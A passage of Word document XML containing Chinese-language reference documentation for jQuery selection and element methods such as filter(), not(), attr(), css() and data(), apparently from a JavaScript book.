        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>弹出内部栈，并将选择结果重置为最后一次产生改变的选择方法之前的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eq(idx)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>只选择已选中元素中指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>中，负数索引将从尾部开始计数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter(elts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter(f(idx):boolean)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>过滤选择结果，让它只包含也匹配选择器</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，或者只包含在类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>elts</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素，或者只包含将断言函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为元素的方法调用时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>find(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择某个选中元素的所有匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的子孙元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>first()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只选择第一个已选中的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>has(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>has(elt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>过滤选择结果，让它们只</w:t>
      </w:r>
      <w:r>
        <w:t>包含这些选中元素：它们要么有一个匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的子孙元素，要么是</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>的祖先元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>last()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只选择最后一个选中的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>next([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个已选中元素的下一个兄弟节点。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，将排除那些不匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nextAll([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个已选中元素后面的所有兄弟节点。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，将排除那些不匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nextUntil(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个已选中元素后面的所有兄弟节点，直到（但不包含）第一个匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的兄弟节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>not(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>not(elts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>not(f(idx):boolean)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>的反方法。它过滤选择结果，并排除匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，或者包含在</w:t>
      </w:r>
      <w:r>
        <w:t>elts</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素，或者使</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>elts</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以是一个单独的元素，或者是一个由元素组成的类数组对象。</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>将作为每一个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>offsetParent()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择距离每个选中元素位置最近的祖先元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parent([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素的父元素。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，将排除那些不匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parents([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素的祖先元素。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>将排除那些不匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parentsUntil(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素的祖先元素，直到（但不包含）第一个匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prev([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素的前一个兄弟元素。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，将排除那些不匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>prevAll([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素之前的所有兄弟元素。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，将排除那些不匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prevUntil(sel)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素之前的兄弟元素，直到（但不包含）第一个匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pushStack(elts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将当前选择结果压入栈中，以便之后</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还原它，然后选择</w:t>
      </w:r>
      <w:r>
        <w:t>elts</w:t>
      </w:r>
      <w:r>
        <w:t>数组（或类数组对象）中的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>siblings([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每个选中元素的兄弟节点，不包含该元素自己。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>，将排除所有不匹配的兄弟节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slice(startidx,[endidx])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>过滤选择结果，使它只包含索引大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>startidx</w:t>
      </w:r>
      <w:r>
        <w:t>并小于（但不等于）</w:t>
      </w:r>
      <w:r>
        <w:t>endidx</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。负索引将从选择结果的尾部开始计数。如果省略</w:t>
      </w:r>
      <w:r>
        <w:t>endidx</w:t>
      </w:r>
      <w:r>
        <w:t>，将使用</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>元素方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿描述的方法用于查询及设置元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性。</w:t>
      </w:r>
      <w:r>
        <w:t>带有名为</w:t>
      </w:r>
      <w:r>
        <w:t>current</w:t>
      </w:r>
      <w:r>
        <w:t>的参数的</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>回调函数将被传入它正在计算新值的任何对象的当前值。参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>addClass(names)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>addClass(f(idx,current):names)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>添加指定的一个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类名到每一个选中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中。或者将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个元素的方法调用并计算出要添加的类名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attr(name):value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attr(name,value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attr(name,f(idx,current):value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attr(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果只传入一个字符串参数，则返回第一个选中元素的指定名字的属性值。如果传入两个参数，则将所有选中元素的指定名字的属性设置为指定的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，或者将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个元素的方法调用以计算出新的值。如果只传入一个对象参数，则将这个对象的属性名作为</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>元素的属性名，同时对象的属性值为作元素的属性值或属性计算函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>css(name):value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>css(name,value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>css(name,f(idx,current):value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>css(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>attr()</w:t>
      </w:r>
      <w:r>
        <w:t>，但它查询或设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>格式属性，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data():obj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data(key):value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data(key,value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则返回第一个选中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果传入一个字符串参数，则返回对应</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象的指定名字的属性的值。如果传入两个参数，则将所有选中元素的对应</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定名字的属</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>性设置为指定</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>。如果传入一个对象参数，则用它替换所有选中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hasClass(name):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果任意一个选中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中包含</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>height():in</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>height(h)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>height(f(idx,current):int)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的高度（不包含内边距、边框和外边距），或者将所有选中元素的高度设为</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
